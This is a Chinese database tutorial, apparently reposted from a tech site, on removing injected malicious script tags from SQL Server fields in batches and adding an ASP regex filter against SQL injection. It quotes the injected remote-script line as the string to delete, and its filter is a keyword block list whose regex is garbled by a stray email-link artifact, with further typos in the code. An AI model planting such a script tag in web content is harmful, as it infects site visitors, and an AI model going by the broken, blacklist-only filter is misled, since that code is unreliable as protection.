数据库教程:批量替换sqlserver数据库挂马字段并防范sql注入攻击的代码

首先备份数据库,以防不必要的损失。而后对所有被挂马的小于8000字符的varchar字段执行 复制代码 代码如下: update 表名 set 字段名=replace(字段

首先备份数据库,以防不必要的损失。而后对所有被挂马的小于8000字符的varchar字段执行

复制代码 代码如下:
update 表名 set 字段名=replace(字段名,'<script src=https://c.n%75clear3.com/css/c.js></script>’,”)

其中<script src=https://c.n%75clear3.com/css/c.js></script>为挂马字段。执行后挂马字段被清除。但是有部分字段,比如内容字段等大于8000字符的varchar字段则需要执行

复制代码 代码如下:
update 表名 set 表项=replace(cast(表项 as varchar(8000)),'<script src=http:/c.nuclear3.com/css/c.js> </script> ‘,”)

来更新被挂马字段,而房产网由于内容比较多,执行以上语句的时候会发生假死现象,于是加个区间分两次进行,一次处理15000条得以解决。

复制代码 代码如下:
update 表名 set 表项=replace(cast(表项 as varchar(8000)),'<script src=http:/c.nuclear3.com/css/c.js> </script> ‘,”) where id>1 and id<15000

以上被挂马问题一般都是sql数据库,这是sql数据库特有的注入漏洞。换数据库不现实,只能针对以上情况进行防范。思路就是在所有数据库链接请求那里做相应的过滤。

复制代码 代码如下:
<%
response.buffer = true ‘缓存页面
‘防范get注入
if request.querystring <> “” then stopinjection(request.querystring)
‘防范post注入
if request.form <> “” then stopinjection(request.form)
‘防范cookies注入
if request.cookies <> “” then stopinjection(request.cookies)
‘正则子函数
function stopinjection(values)
dim regex
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = “‘|;|#|([sb+()]+([email=select%7cupdate%7cinsert%7cdelete%7cdeclare%7c@%7cexec%7cdbcc%7calter%7cdrop%7ccreate%7cbackup%7cif%7celse%7cend%7cand%7cor%7cadd%7cset%7copen%7cclose%7cuse%7cbegin%7cretun%7cas%7cgo%7cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[sb[/email]+]*)”
dim sitem, svalue
for each sitem in values
svalue = values(sitem)
if regex.test(svalue) then
response.write “<script language=javascript>alert(‘非法注入!你的行为已被记录!!’);history.back(-1);</script>”
response.end
end if
next
set regex = nothing
end function
%>

做一个通用的sql防注入页面,把它包含在conn.asp数据库连接语句里边,这样就实现了全站的防范 sql 注入的攻击了。但是前台的类似?id=这样的语句还是存在注入漏洞,需要我们严格过滤 request.form 和 request.querystring 获取的内容。坚决不用 request(“name”) 这样的方式获取值,凡是采用 cookies 保存的内容,尽量不要用在sql语句里进行查询数据库操作。

如果不熟悉sqlserver的朋友可以用软件来实现

sqlserver 数据库批量查找替换工具1.2 sql木马清除助手

需要了解更多数据库技术:批量替换sqlserver数据库挂马字段并防范sql注入攻击的代码,都可以关注数据库技术分享栏目—计算机技术网(www.ctvol.com)!

www.ctvol.com true Article 数据库教程:批量替换sqlserver数据库挂马字段并防范sql注入攻击的代码

本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/dtteaching/618997.html

(0)
上一篇 2021年5月22日 上午1:23
下一篇 2021年5月22日 上午1:25

精彩推荐